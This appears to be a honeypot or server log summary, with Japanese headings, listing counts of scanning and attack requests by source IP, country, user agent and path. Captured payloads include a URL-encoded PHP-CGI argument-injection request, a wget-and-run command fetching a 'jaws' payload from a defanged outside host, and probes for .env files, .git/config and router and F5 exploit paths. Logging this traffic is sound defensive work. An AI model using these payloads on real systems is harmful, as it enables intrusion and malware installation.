1	POST	//%63%67%69%2d%62%69%6e/%70%68%70?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%6e	HTTP/1.1
3	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/mgmt/tm/util/bash`	HTTP/1.1
1	PRI	`*`	HTTP/2.0

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
2	4.17.224.134	United States
1	45.56.108.128	United States
1	45.79.128.205	United States
2	45.79.172.21	United States
1	45.79.181.179	United States
1	45.79.181.251	United States
29	51.79.29.48	Canada
1	51.195.145.74	France
1	64.62.197.227	United States
1	64.62.197.233	United States
2	64.85.173.196	United States
2	65.141.6.170	United States
2	65.157.23.94	United States
2	67.21.36.5	United States
2	69.162.243.124	United States
2	69.194.182.218	United States
2	71.127.254.129	United States
2	93.160.62.190	Denmark
2	103.169.35.140	Vietnam
4	128.1.34.68	United States
1	139.162.70.71	Netherlands
6	152.32.210.168	Hong Kong
2	152.89.196.54	Russia
2	152.89.196.211	Russia
2	162.142.125.13	United States
1	162.243.146.17	United States
7	165.22.247.214	United States
1	165.154.119.11	Hong Kong
2	167.94.138.36	United States
1	167.99.112.206	United States
2	167.248.133.36	United States
7	170.64.174.220	United States
1	172.104.11.4	United States
1	172.104.11.34	United States
1	172.104.11.51	United States
1	172.105.128.11	United States
1	172.105.128.12	United States
1	172.245.21.149	United States
1	175.107.13.19	Pakistan
1	176.124.110.82	Romania
1	179.43.177.243	Panama
1	180.149.125.172	Mongolia
2	185.32.164.145	Russia
1	185.180.143.49	Portugal
7	188.166.229.98	United States
2	192.155.90.220	United States
1	192.241.236.44	United States
11	193.32.162.159	Romania
1	194.55.224.203	Bulgaria
2	194.87.151.116	Czechia
1	194.110.203.85	private ip address
1	198.235.24.3	United States
1	202.80.160.229	Singapore
2	206.226.64.150	United States
2	212.154.7.246	Turkey

UserAgent一覧

件数	UserAgent
31	`-`
1	`Hello, World`
1	`Hello, world`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
3	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 8_2) AppleWebKit/556.53 (KHTML, like Gecko) Chrome/69.0.2672 Safari/537.36`
3	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36`
9	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 OPR/95.0.0.0`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
4	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
11	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46`
1	`Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 OPR/58.0.3135.132`
56	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/544.52 (KHTML, like Gecko) Chrome/60.0.2083 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/573.36 (KHTML, like Gecko) Chrome/81.0.263 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0`
4	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
3	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Mozilla/5.0 zgrab/0.x`
3	`Mozilla/5.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`-`
1		`MGLNDD_13.67.44.234_80`
1		`O\xf1\xc0D\xb0\x0e?\xbb\xe2\x81\x89\x9e\xb6\xa7\x0e\x8d\xadd\xdb1\xce:4R\xb3\xeb\xaac\xc2\x80U\xa6\xe5\|\xce\xe9gP~(\xb1\x8c\x0f\xedw\x11\xdc\x88a\xc8\xf7r\x9b\xe5\"\x8cd\xad\x80\xfb_\x11R\x89`\x05\xae\xb9)3<PqN<\xadT\x97\x9b\v\x17\x94\xf7\x98\xaa\x94\xdb\x8dy\r\xaaX\x1f\xe8Y\x996\xe2!\xdc\xbeG,ET\xe5M\x92\x9f\xf8Vy\v^\xc7\x8dO4_\xd3\x83h\xa7\x868=7\xfa\x98pM\xa4\xec\x87\xf2H\x93\xe2\xaeICn\xa0\xdd3\xe2K\xf2\xef\xcd\xf1v\x17\x19\xd3\x8f\r\xed\x8av\xf1\xe1.\x97\x8f\x9cd\|R\xf6\xc0Hu\xb4\x12\"`	\xb7\xe4\xf5\x1a\x7f\xe4\x82\xcc\x9b\x9e
1		`\x05`
1		`\x16\x03\x01\x01\t\x01`
23		`\x16\x03\x01`
33	GET	`/.env`	HTTP/1.1
2	GET	`/.git/config`	HTTP/1.1
2	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/__tests__/test-become/.env`	HTTP/1.1
2	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/admin/.env`	HTTP/1.1
1	GET	`/api/.env`	HTTP/1.1
1	GET	`/axis2-admin/`	HTTP/1.1
1	GET	`/axis2/`	HTTP/1.1
1	GET	`/axis2/axis2-admin/`	HTTP/1.1
1	GET	`/backend/.env`	HTTP/1.1
1	GET	`/c/`	HTTP/1.1
3	GET	`/client/get_targets`	HTTP/1.1
1	GET	`/crm/.env`	HTTP/1.1
11	GET	`/dispatch.asp`	HTTP/1.1
1	GET	`/download/.env`	HTTP/1.1
10	GET	`/favicon.ico`	HTTP/1.1
3	GET	`/geoip/`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/local/.env`	HTTP/1.1
1	GET	`/main/.env`	HTTP/1.1
1	GET	`/old/.env`	HTTP/1.1
2	GET	`/robots.txt`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+167[.]71[.]210[.]63/jaws;sh+/tmp/jaws`	HTTP/1.1
2	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/sites/.env`	HTTP/1.1
1	GET	`/sugar_version.json`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.0
3	GET	`/upl.php`	HTTP/1.1
1	GET	`/vendor/.env`	HTTP/1.1
1	POST	`/GponForm/diag_Form?images/`	HTTP/1.1
1	POST	`/__tests__/test-become`	HTTP/1.1
1	POST	`/admin`	HTTP/1.1
1	POST	`/api`	HTTP/1.1
1	POST	`/backend`	HTTP/1.1
4	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/crm`	HTTP/1.1
1	POST	`/download`	HTTP/1.1
1	POST	`/local`	HTTP/1.1
1	POST	`/main`	HTTP/1.1
1	POST	`/old`	HTTP/1.1
1	POST	`/sites`	HTTP/1.1
1	POST	`/vendor`	HTTP/1.1
3	PRI	`*`	HTTP/2.0